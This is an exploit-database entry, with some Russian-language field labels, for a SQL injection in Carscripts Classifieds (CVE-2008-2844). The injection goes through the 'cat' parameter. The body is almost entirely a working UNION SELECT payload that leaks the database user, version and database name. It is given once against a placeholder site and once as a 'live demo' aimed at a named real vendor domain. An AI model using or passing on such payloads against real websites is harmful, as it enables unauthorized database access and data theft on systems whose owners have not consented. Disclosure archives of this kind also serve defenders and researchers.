Exploit Carscripts Classifieds - 'cat' SQL Injection

[Exploiter]

EDB-ID

5857

Проверка EDB

1. Пройдено

Автор

STACK

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2008-2844

Дата публикации

2008-06-18

Carscripts Classifieds Sql INjection

By Stack
Home v4-team.com
###########################################
[+] : you can see the Result in 'Title'
[+] : Open the source page to see the result
###########################################
poc : http://site.co.il/index.php?cat=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database()),2,3/*

live demo
http://www.carscripts.com/cars/index.php?cat=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database()),2,3/*

# milw0rm.com [2008-06-18]